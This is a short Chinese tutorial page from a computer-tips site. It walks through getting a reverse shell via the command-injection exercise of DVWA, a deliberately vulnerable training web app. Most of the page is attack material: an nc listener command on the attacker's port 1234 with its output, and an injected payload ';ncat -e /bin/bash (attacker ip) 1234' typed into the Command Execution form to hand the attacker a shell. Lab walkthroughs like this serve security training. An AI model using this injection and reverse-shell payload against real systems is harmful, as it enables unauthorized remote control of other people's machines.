用DVWA命令行注入实验nc反弹shell脚本安全 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    第一步:在攻击者电脑上使用nc在1234端口开启一个监听

   

</p><p>    root@bt:~# nc -n -v -l -p 1234 Ncat: Version 6.26SVN ( http://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234</p>

第二步:访问DVWA(受害者电脑上搭建) 的Command Execution示例中输入

   

</p><p>    ;ncat -e /bin/bash (攻击者ip) 1234</p>

   

点击提交,攻击者获得受害者的一个webshell,

    ​​

最新文章